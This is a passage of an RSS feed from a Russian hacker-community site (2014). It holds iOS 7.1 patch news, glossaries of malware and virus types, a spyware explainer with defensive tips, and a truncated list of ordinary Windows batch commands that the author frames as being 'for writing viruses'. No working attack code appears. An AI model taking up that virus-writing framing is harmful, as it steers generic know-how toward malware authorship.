<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>CYBER_COMMUNITY</title>
		<link>http://hackerzone.ucoz.lv/</link>
		<description></description>
		<lastBuildDate>Thu, 20 Mar 2014 19:16:53 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="http://hackerzone.ucoz.lv/news/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>Apple IOS 7.1</title>
			<description>&lt;p&gt;&lt;img width=&quot;349&quot; height=&quot;268&quot; style=&quot;width: 273px; height: 227px;&quot; src=&quot;http://hackerzone.ucoz.lv/te_1690991.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Компания Apple поблагодарила участников хакерской группы Evad3rs за обнаружение множества уязвимостей в iOS 7.0. &lt;/p&gt;&lt;p&gt;Именно работа хакеров позволила разработчикам американской корпорации устранить все существующие бреши и представить пользователям &lt;a href=&quot;http://soft.mail.ru/pressrl_page.php?id=54768&quot; target=&quot;_blank&quot; sl-processed=&quot;1&quot;&gt;iOS 7.1&lt;/a&gt;. &lt;/p&gt;&lt;p&gt;Напомним, что осуществление джейлбрейка на устройстве пользователя предоставляет ему возможность загружать программы сторонних производителей, а не только с App Store. Джейлбрейк способен использовать бреши в iOS, однако опасность состоит в том, что обнаруженные уязвимости также могут быть использованы в злонамеренных целях. В связи с этим Apple стремится закрывать их в кратчайшие сроки. &lt;/p&gt;&lt;p&gt;Согласно информации Apple, в iOS 7.1 были устранены бреши, обнаруженные независимыми разработчиками, корпоративными IT-специалистами и даже кон...</description>
			<content:encoded>&lt;p&gt;&lt;img width=&quot;349&quot; height=&quot;268&quot; style=&quot;width: 273px; height: 227px;&quot; src=&quot;http://hackerzone.ucoz.lv/te_1690991.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Компания Apple поблагодарила участников хакерской группы Evad3rs за обнаружение множества уязвимостей в iOS 7.0. &lt;/p&gt;&lt;p&gt;Именно работа хакеров позволила разработчикам американской корпорации устранить все существующие бреши и представить пользователям &lt;a href=&quot;http://soft.mail.ru/pressrl_page.php?id=54768&quot; target=&quot;_blank&quot; sl-processed=&quot;1&quot;&gt;iOS 7.1&lt;/a&gt;. &lt;/p&gt;&lt;p&gt;Напомним, что осуществление джейлбрейка на устройстве пользователя предоставляет ему возможность загружать программы сторонних производителей, а не только с App Store. Джейлбрейк способен использовать бреши в iOS, однако опасность состоит в том, что обнаруженные уязвимости также могут быть использованы в злонамеренных целях. В связи с этим Apple стремится закрывать их в кратчайшие сроки. &lt;/p&gt;&lt;p&gt;Согласно информации Apple, в iOS 7.1 были устранены бреши, обнаруженные независимыми разработчиками, корпоративными IT-специалистами и даже конкурентами Apple, к примеру, компанией Google. &lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/apple_ios_7_1/2014-03-20-7</link>
			<category>Новости PC</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/apple_ios_7_1/2014-03-20-7</guid>
			<pubDate>Thu, 20 Mar 2014 19:16:53 GMT</pubDate>
		</item>
		<item>
			<title>Классификация вредоносного ПО</title>
			<description>&lt;p&gt;Антивирусная лаборатория &quot;Доктор Веб&quot; строит классификацию компьютерных вредоносных программ следующим образом: &lt;/p&gt;&lt;p&gt;1. Вредоносные программы, cетевые атаки и виды интернет - мошенничества:&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Атаки методом подбора пароля (Brute force attacks)&lt;/b&gt; — так называемые атаки методом &quot;грубой силы&quot;. Как правило, пользователи применяют простейшие пароли, например &quot;123&quot;, &quot;admin&quot; и т.д. Этим и пользуются компьютерные злоумышленники, которые при помощи специальных троянских программ вычисляют необходимый для проникновения в сеть пароль методом подбора - на основании заложенного в эту программу словаря паролей или генерируя случайные последовательности символов.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;&lt;p align=&quot;justify&quot;&gt;2. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Бомбы с часовыми механизмами (Time bombs)&lt;/b&gt; — одна из разновидностей логических бомб, в которых срабатывание скрытого мо...</description>
			<content:encoded>&lt;p&gt;Антивирусная лаборатория &quot;Доктор Веб&quot; строит классификацию компьютерных вредоносных программ следующим образом: &lt;/p&gt;&lt;p&gt;1. Вредоносные программы, cетевые атаки и виды интернет - мошенничества:&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Атаки методом подбора пароля (Brute force attacks)&lt;/b&gt; — так называемые атаки методом &quot;грубой силы&quot;. Как правило, пользователи применяют простейшие пароли, например &quot;123&quot;, &quot;admin&quot; и т.д. Этим и пользуются компьютерные злоумышленники, которые при помощи специальных троянских программ вычисляют необходимый для проникновения в сеть пароль методом подбора - на основании заложенного в эту программу словаря паролей или генерируя случайные последовательности символов.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;&lt;p align=&quot;justify&quot;&gt;2. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Бомбы с часовыми механизмами (Time bombs)&lt;/b&gt; — одна из разновидностей логических бомб, в которых срабатывание скрытого модуля определяется временем.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;3. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Вишинг (Vishing)&lt;/b&gt; — технология интернет - мошенничества, разновидность фишинга, заключающаяся в использовании в злонамеренных целях «war diallers» (автонабирателей) и возможностей Интернет-телефонии (VoIP) для кражи личных конфиденциальных данных, таких как пароли доступа, данные банковских и идентификационных карт и т.д. Потенциальные жертвы получают телефонные звонки, якобы от имени легальных организаций, в которых их просят ввести с клавиатуры телефона, смарт - фона или КПК пароли, PIN - коды и другую личную информацию, используемую в последствии злоумышленниками для кражи денег со счета жертвы и в других преступлениях.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;4.&amp;nbsp;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Дифейсмент (Defacement)&lt;/b&gt; — искажение веб-страниц. Вид компьютерного вандализма, иногда являющийся для хакера забавой, а иногда средством выражения политических пристрастий. Искажения могут производится в какой-то части сайта или выражаться в полной замене существующих на сайте страниц (чаще всего, стартовой).&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;5. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;DoS-атаки (DoS-attacks)&lt;/b&gt; — или атаки на отказ в обслуживании. Популярный у злоумышленников вид сетевых атак, граничащий с терроризмом, заключающийся в посылке огромного числа запросов с требованием услуги на атакуемый сервер с целью выведения его из строя. При достижении определенного количества запросов (ограниченного аппаратными возможностями сервера), последний не справляется с такими запросами, что приводит к отказу в обслуживании. Как правило, такой атаке предшествует спуфинг. DoS-атаки стали широко используемым средством запугивания и шантажа конкурентов.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;6. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Зомби (Zombies)&lt;/b&gt; — маленькие компьютерные программы, разносимые по сети интернет компьютерными червями. Программы - зомби устанавливают себя в пораженной системе и ждут дальнейших команд к действию.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;7. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Клавиатурные перехватчики (Keyloggers)&lt;/b&gt; — вид троянских программ, чьей основной функцией является перехват данных, вводимых пользователем через клавиатуру. Объектами похищения являются персональные и сетевые пароли доступа, логины, данные кредитных карт и другая персональная информация.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;8. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Логические бомбы (Logic bombs)&lt;/b&gt; — вид Троянского коня - скрытые модули, встроенные в ранее разработанную и широко используемую программу. Являются средством компьютерного саботажа. Такой модуль является безвредным до определенного события, при наступлении которого он срабатывает (нажатие пользователем определенных кнопок клавиатуры, изменение в файле или наступление определенной даты или времени). &lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;9. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Люки (Backdoors)&lt;/b&gt; — программы, обеспечивающие вход в систему или получение привилегированной функции (режима работы) в обход существующей системы полномочий. Часто используются для обхода существующей системы безопасности. Люки не инфицируют файлы, но прописывают себя в реестр, модифицируя таким образом ключи реестра.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;10. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Почтовые бомбы (Mail bombs)&lt;/b&gt; — один из простейших видов сетевых атак. Злоумышленником посылается на компьютер пользователя или почтовый сервер компании одно огромное сообщение, или множество (десятки тысяч) почтовых сообщений, что приводит к выводу системы из строя.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;11. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Руткит (Rootkit)&lt;/b&gt; — вредоносная программа, предназначенная для перехвата системных функций операционной системы (API) с целью сокрытия своего присутствия в системе. Кроме того, Rootkit может маскировать процессы других программ, различные ключи реестра, папки, файлы. Rootkit распространяются как самостоятельные программы, так и как дополнительные компоненты в составе иных вредоносных программ - программ - люков (backdoor), почтовых червей и проч. По принципу своей работы Rootkit условно разделяют на две группы: User Mode Rootkits (UMR) - т.н. Rootkit, работающие в режиме пользователя, и Kernel Mode Rootkit (KMR) - т.н. Rootkit, работающие в режиме ядра. Работа UMR базируется на перехвате функций библиотек пользовательского режима, а работа KMR базируется на установке в систему драйвера, который осуществляет перехват функций на уровне системного ядра, что значительно усложняет его обнаружение и обезвреживание.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;12. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Скамминг (Scamming)&lt;/b&gt; — от английского &quot;scamming&quot;, что означает &quot;жульничество&quot;, вид интернет - мошенничества. Заключается в привлечении клиентов, якобы брачными агентствами (на самом деле скам - агентствами), с целью выуживания у них денег брачными аферами.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;13. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Сниффинг (Sniffing)&lt;/b&gt; — вид сетевой атаки, также называется &quot;пассивное прослушивание сети&quot;. Несанкционированное прослушивание сети и наблюдение за данными производятся при помощи специальной не вредоносной программой - пакетным сниффером, который осуществляет перехват всех сетевых пакетов домена, за которым идет наблюдение. Перехваченные таким сниффером данные могут быть использованы злоумышленниками для легального проникновения в сеть на правах фальшивого пользователя.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;14. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Спуфинг (Spoofing)&lt;/b&gt; — вид сетевой атаки, заключающейся в получении обманным путем доступа в сеть посредством имитации соединения. Используется для обхода систем управления доступом на основе IP адресов, а также для набирающей сейчас обороты маскировки ложных сайтов под их легальных двойников или просто под законные бизнесы.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;15. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Троянские кони (Троянцы) (Trojan Horses)&lt;/b&gt; — вредоносные программы, содержащие скрытый модуль, осуществляющий несанкционированные пользователем действия в компьютере. Эти действия не обязательно будут разрушительными, но они всегда направлены во вред пользователю. Название этого типа атак происходит от известной легенды о деревянной статуе коня, использованной греками для проникновения в Трою. &lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;Троянские программы - вандалы подменяют какую-либо из часто запускаемых программ, выполняют ее функции или имитируют такое исполнение, одновременно производя какие-либо вредоносные действия (стирают файлы, разрушают каталоги, форматируют диски, отсылают пароли или другую конфиденциальную информацию, хранящуюся на ПК пользователя). Некоторые Троянские программы содержат механизм обновления своих компонент из сети интернет.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;16. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Фишинг (Phishing)&lt;/b&gt; — технология интернет - мошенничества, заключающаяся в краже личных конфиденциальных данных, таких как пароли доступа, данные банковских и идентификационных карт и т.д. При помощи спамерских рассылок или почтовых червей потенциальным жертвам рассылаются подложные письма, якобы от имени легальных организаций, в которых их просят зайти на подделанный преступниками &quot;сайт&quot; такого учреждения и подтвердить пароли, PIN-коды и другую личную информацию, используемую в последствии злоумышленниками для кражи денег со счета жертвы и в других преступлениях.&lt;/font&gt;&lt;/p&gt;&lt;p align=&quot;justify&quot;&gt;17. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;b&gt;Фарминг&lt;/b&gt;&lt;strong&gt; (pharming)&lt;/strong&gt; — сравнительно новый вид интернет - мошенничества. Фарминг (pharming) - технологии позволяют изменять DNS (Domain Name System) записи либо записи в файле HOSTS. При посещении пользователем легитимной, с его точки зрения, страницы производится перенаправление на поддельную страницу, созданную для сбора конфиденциальной информации. Чаще всего такие страницы подменяют страницы банков – как оффлайновых, так и онлайновых.&lt;/font&gt;&lt;/p&gt;&lt;/font&gt;&lt;p&gt;&lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/klassifikacija_vredonosnogo_po/2014-03-20-6</link>
			<category>Компьютерные Вирусы</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/klassifikacija_vredonosnogo_po/2014-03-20-6</guid>
			<pubDate>Thu, 20 Mar 2014 18:39:52 GMT</pubDate>
		</item>
		<item>
			<title>Классификация компьютерных вирусов</title>
			<description>&lt;p&gt;1. &lt;font face=&quot;Arial&quot;&gt;&lt;strong&gt;Полиморфные вирусы&lt;/strong&gt; (Polymorphic viruses) - или вирусы с самомодифицирующимися расшифровщиками - вирусы, использующие помимо шифрования кода специальную процедуру расшифровки, изменяющую саму себя в каждом новом экземпляре вируса, что ведет к отсутствию у него байтовых сигнатур. Расшифровщик не является постоянным - он уникален для каждого экземпляра вируса.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot;&gt;2. &lt;strong&gt;MtE вирусы&lt;/strong&gt; (MtE viruses) - полиморфные вирусы, созданные с помощью генератора полиморфизма MtE (Mutant Engine). Такой генератор представляет собой специальный алгоритм, который отвечает за функции шифровки / расшифровки и генерацию расшифровщиков и присоединяется к любому объектному коду вируса. Такой расшифровщик не имеет ни одного постоянного бита, длина его всегда разная.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot;&gt;3. &lt;strong&gt;Pезидентный (в памяти) вирус&lt;/strong&gt; (Memory resident virus) - постоянно присутствующий в памяти вирус, написанный, как прав...</description>
			<content:encoded>&lt;p&gt;1. &lt;font face=&quot;Arial&quot;&gt;&lt;strong&gt;Полиморфные вирусы&lt;/strong&gt; (Polymorphic viruses) - или вирусы с самомодифицирующимися расшифровщиками - вирусы, использующие помимо шифрования кода специальную процедуру расшифровки, изменяющую саму себя в каждом новом экземпляре вируса, что ведет к отсутствию у него байтовых сигнатур. Расшифровщик не является постоянным - он уникален для каждого экземпляра вируса.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot;&gt;2. &lt;strong&gt;MtE вирусы&lt;/strong&gt; (MtE viruses) - полиморфные вирусы, созданные с помощью генератора полиморфизма MtE (Mutant Engine). Такой генератор представляет собой специальный алгоритм, который отвечает за функции шифровки / расшифровки и генерацию расшифровщиков и присоединяется к любому объектному коду вируса. Такой расшифровщик не имеет ни одного постоянного бита, длина его всегда разная.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot;&gt;3. &lt;strong&gt;Pезидентный (в памяти) вирус&lt;/strong&gt; (Memory resident virus) - постоянно присутствующий в памяти вирус, написанный, как правило, на языке Ассемблер или Си. Такие вирусы обладают возможностью более эффективно заражать программы и противодействовать антивирусным средствам. Занимает небольшой объем памяти. Пребывает в состоянии готовности к продолжению выполнения своей задачи до выгрузки, перезагрузки или выключения компьютера. Активизируется и выполняет заданные вирусописателем действия например при достижении компьютером определенного состояния (срабатывания таймера, др.). Все бутовые вирусы резидентны.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot;&gt;4. &lt;strong&gt;Скрипт - вирусы&lt;/strong&gt; (Script virus) - вирусы, написанные на языках Visual Basic, Basic Script, Java Script, Jscript. &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;На компьютер пользователя такие вирусы, чаще всего, проникают в виде почтовых сообщений, содержащих во вложениях файлы-сценарии. Программы на языках Visual Basic и Java Script могут располагаться как в отдельных файлах, так и встраиваться в HTML - документ и в таком случае интерпретироваться браузером, причем не только с удаленного сервера, но и с локального диска.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;5. &lt;strong&gt;Стелс вирусы&lt;/strong&gt; (Stealth virus) - вирусные программы, предпринимающие специальные действия для маскировки своей деятельности с целью сокрытия своего присутствия в зараженных объектах. Так называемая Стелс-технология может включать в себя: затруднение обнаруженья вируса в оперативной памяти, затруднение трассировки и дезассемблирования вируса, маскировку процесса заражения, затруднение обнаружения вируса в зараженной программе и загрузочном секторе.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;6. &lt;strong&gt;Шифрованные вирусы&lt;/strong&gt; (Encrypted viruses) - вирусы, которые сами шифруют свой код для затруднения их дезассемблирования и обнаружения в файле, памяти или секторе. Каждый экземпляр такого вируса будет содержать только короткий общий фрагмент - процедуру расшифровки который можно выбрать в качестве сигнатуры. В случае каждого инфицирования он автоматически зашифровывает себя, и каждый раз по-разному. Таким способом вирус пытается избежать обнаружения антивирусными программами.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;7. &lt;strong&gt;Анти-антивирусный вирус &lt;/strong&gt; &lt;index&gt;(Anti-antivirus Virus, Retrovirus) - компьютерная вирусная программа объектом нападения которой являются антивирусные программы.&lt;/index&gt; &lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;8. &lt;strong&gt;Вирусная программа - червь&lt;/strong&gt; (Worm - virus) - паразитическая программа, обладающая механизмом саморазмножения. Программа способна размножать свои копии, но не поражать другие компьютерные программы. Проникает на компьютер из сети (чаще всего как вложение в сообщениях электронной почты или через сеть Интернет) и рассылает свои функциональные копии на другие компьютерные сети.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;9. &lt;strong&gt;Вирусный мистификатор&lt;/strong&gt; (Hoax) - не являющееся вирусом почтовое сообщение. На компьютер пользователя мистификация приходит в виде письма, написанного в подчеркнуто нейтральном тоне, в котором указывается на якобы распространяющийся новый вирус.&lt;br&gt; Большинство вирусных мистификаций обладают одной или несколькими нижеследуемыми характеристиками. Имя вируса, на которое ссылается автор сообщения составляется не по правилам, используемым большинством антивирусных компаний. Особо отмечается, что &quot;вирус&quot; пока не обнаруживается антивирусными программами. Пользователю предлагается найти некий файл с помощью поискового средства Windows и удалить его с диска. В письме содержится призыв в случае обнаружения указанного файла сообщить об этом всем своим знакомым и все тем, чьи адреса есть в адресной книге пользователя. &lt;br&gt; Несмотря на всю безобидность подобного розыгрыша опасность его очевидна - массовая рассылка копий этого бесполезного сообщения загружает почтовый трафик и отнимает время пользователей.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;10. &lt;strong&gt;Вирусы - спутники, вирусы - компаньоны &lt;/strong&gt; &lt;index&gt;(Virus - companion) - формально являются файловыми вирусами. Не внедряются в исполняемые программы. Такие вирусы используют особенность системы DOS, позволяющую программному файлу с тем же названием, но другим расширением действовать с разными приоритетами. &lt;br&gt;Под приоритетом понимают присваиваемый задаче, программе или операции признак, определяющий очередность их выполнения вычислительной системой. Большинство таких вирусов создают .COM файл который обладает более высоким приоритетом нежели .EXE файлы с тем же самым названием. При запуске файла по имени (без указания расширения) будет запущен файл с расширением .СОМ. &lt;/index&gt; &lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt; &lt;index&gt;Такие вирусы могут быть резидентными и маскировать файлы - двойники&lt;/index&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;index&gt;11. &lt;strong&gt;&quot;Дроппер&quot;&lt;/strong&gt; (Dropper) - файл - носитель, устанавливающий вирус в систему. Техника иногда используемая вирусописателями для &quot;прикрытия&quot; вирусов от антивирусных программ.&lt;/index&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=&quot;Arial&quot; size=&quot;3&quot;&gt;&lt;font face=&quot;Arial, Helvetica, sans-serif&quot; size=&quot;3&quot;&gt;&lt;index&gt;12. &lt;strong&gt;Зоологический вирус&lt;/strong&gt; (Zoo virus) - вирус, существующий только в антивирусных лабораториях, в коллекция исследователей вирусов и не встречается в &quot;дикой природе&quot;.&lt;/index&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/katigorii_virusov_i_ikh_oboznachenie/2014-03-20-5</link>
			<category>Компьютерные Вирусы</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/katigorii_virusov_i_ikh_oboznachenie/2014-03-20-5</guid>
			<pubDate>Thu, 20 Mar 2014 18:04:03 GMT</pubDate>
		</item>
		<item>
			<title>Немного теориии! &quot;SPY_SOFT&quot;</title>
			<description>&lt;p&gt;&lt;img width=&quot;276&quot; height=&quot;184&quot; style=&quot;width: 474px; height: 189px;&quot; src=&quot;http://hackerzone.ucoz.lv/imagesXY9P9IQP.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Шпионским программным обеспечением называются любые программы, которые следят за использованием компьютера, собирают информацию или извлекают конфиденциальные данные без явного согласия пользователя. Например, шпионская программа может запоминать посещаемые пользователем Web-узлы и время посещений, регистрировать все нажатия на клавиши или выполнять несанкционированную инвентаризацию установленного программного обеспечения.&lt;br&gt;&lt;br&gt;Некоторые виды шпионских программ затем передают собранную информацию в централизованное хранилище. Например, шпионские программы одного типа могут предупредить своего владельца, что пользователь компьютера запустил конкретную программу. «Шпионы» других видов могут готовить лазейки для проникновения в систему или настраивать модем на передачу платных звонков, оплачивать которые придется обладателю пораженного компьютера. Другие программы, в частности некотор...</description>
			<content:encoded>&lt;p&gt;&lt;img width=&quot;276&quot; height=&quot;184&quot; style=&quot;width: 474px; height: 189px;&quot; src=&quot;http://hackerzone.ucoz.lv/imagesXY9P9IQP.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Шпионским программным обеспечением называются любые программы, которые следят за использованием компьютера, собирают информацию или извлекают конфиденциальные данные без явного согласия пользователя. Например, шпионская программа может запоминать посещаемые пользователем Web-узлы и время посещений, регистрировать все нажатия на клавиши или выполнять несанкционированную инвентаризацию установленного программного обеспечения.&lt;br&gt;&lt;br&gt;Некоторые виды шпионских программ затем передают собранную информацию в централизованное хранилище. Например, шпионские программы одного типа могут предупредить своего владельца, что пользователь компьютера запустил конкретную программу. «Шпионы» других видов могут готовить лазейки для проникновения в систему или настраивать модем на передачу платных звонков, оплачивать которые придется обладателю пораженного компьютера. Другие программы, в частности некоторые одноранговые приложения обмена файлами, можно отнести к числу шпионских (в зависимости от политики конкретной компании), так как с их помощью по сети можно извлекать с компьютера файлы без согласия владельца.&lt;br&gt;&lt;br&gt;Шпионские программы проникают в компьютеры различными способами. Несомненно, самый распространенный — через сценарии, выполняемые в Web-браузерах или клиентах электронной почты. Еще один путь проникновения шпионских программ в компьютер — при установке программных пакетов. Например, некоторые программисты преднамеренно распространяют шпионское программное обеспечение, проектируя для этого «полезные» приложения с единственной целью заставить пользователя установить скрытых в них «шпионов». Аналогично, полезная программа, такая как видеопроигрыватель DivX, может быть преднамеренно изменена для показа фильмов в формате DivX и одновременно — для распространения шпионской программы.&lt;br&gt;Защититься от проникновения шпионских программ можно, если выделить достаточно средств на обучение пользователей и взять на вооружение решения антишпионажа. Шпионские программы похожи на вирусы, «троянских коней» и «червей», поэтому защищаться от них можно методами, которые подсказывает здравый смысл. Пользователям следует остерегаться неизвестных программ, какими бы привлекательными они ни казались. Нужно также проявлять известную осторожность по отношению к незнакомым Web-узлам, особенно с JavaScript, ActiveX и другими элементами управления на базе Web, с помощью которых легко установить шпионские программы. Многие почтовые клиенты располагают встроенными функциями обработки и вывода на экран HTML-контента, и пользователям следует остерегаться любых непрошеных сообщений электронной почты.&lt;br&gt;&lt;br&gt;Иногда зараженную шпионскими программами систему можно узнать по характерным особенностям поведения: замедленная реакция при вводе данных с клавиатуры; брандмауэры время от времени выдают всплывающие предупреждения; в журналах появляются записи о запросах доступа к незнакомым сайтам Internet со стороны неизвестных прикладных программ; записи журналов свидетельствуют о попытках установить соединение с данным компьютером из узла с неизвестным IP-адресом; снижение системной и сетевой производительности; появление в системе подозрительных файлов.&lt;br&gt;&lt;br&gt;Пользователи должны сообщать об этих аномалиях администраторам для более подробного изучения. &lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/nemnogo_teoriii_spy_soft/2014-03-15-4</link>
			<category>Новости PC</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/nemnogo_teoriii_spy_soft/2014-03-15-4</guid>
			<pubDate>Sat, 15 Mar 2014 13:05:53 GMT</pubDate>
		</item>
		<item>
			<title>Команды для *BAT файлов</title>
			<description>&lt;p&gt;Это команды,которые используются для BAT файлов.&lt;br&gt;Ну вообщем так сказать,для написания вирусов.&lt;br&gt;&lt;br&gt;&lt;img width=&quot;641&quot; height=&quot;425&quot; style=&quot;width: 469px; height: 167px;&quot; src=&quot;http://hackerzone.ucoz.lv/access-granted-hacked.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;ASSOC - Отображает или модифицирует связи расширений файлов&lt;br&gt;AT - Планирует команды и программы для выполнения на компьютере.&lt;br&gt;ATTRIB - Отображает или изменяет атрибуты файла.&lt;br&gt;BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].&lt;br&gt; CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.&lt;br&gt;CALL - Вызывает один *.BAT-файл из другого.&lt;br&gt;CD - Отображает имя или изменяет имя текущей директории.&lt;br&gt;CHCP - Отображает или устанавливает номер активной кодовой страницы.&lt;br&gt;CHDIR - Отображает имя или изменяет имя текущей директории.&lt;br&gt;CHKDSK - Проверяет диск и отображает отчет о состоянии.&lt;br&gt;CLS - Очищает экран.&lt;br&gt;CMD - Стартует новый экземпляр интерпретатора команд Windows NT.&lt;br&gt; COLOR - Устанавливает цвета по умолчанию для переднего...</description>
			<content:encoded>&lt;p&gt;Это команды,которые используются для BAT файлов.&lt;br&gt;Ну вообщем так сказать,для написания вирусов.&lt;br&gt;&lt;br&gt;&lt;img width=&quot;641&quot; height=&quot;425&quot; style=&quot;width: 469px; height: 167px;&quot; src=&quot;http://hackerzone.ucoz.lv/access-granted-hacked.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;ASSOC - Отображает или модифицирует связи расширений файлов&lt;br&gt;AT - Планирует команды и программы для выполнения на компьютере.&lt;br&gt;ATTRIB - Отображает или изменяет атрибуты файла.&lt;br&gt;BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].&lt;br&gt; CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.&lt;br&gt;CALL - Вызывает один *.BAT-файл из другого.&lt;br&gt;CD - Отображает имя или изменяет имя текущей директории.&lt;br&gt;CHCP - Отображает или устанавливает номер активной кодовой страницы.&lt;br&gt;CHDIR - Отображает имя или изменяет имя текущей директории.&lt;br&gt;CHKDSK - Проверяет диск и отображает отчет о состоянии.&lt;br&gt;CLS - Очищает экран.&lt;br&gt;CMD - Стартует новый экземпляр интерпретатора команд Windows NT.&lt;br&gt; COLOR - Устанавливает цвета по умолчанию для переднего и 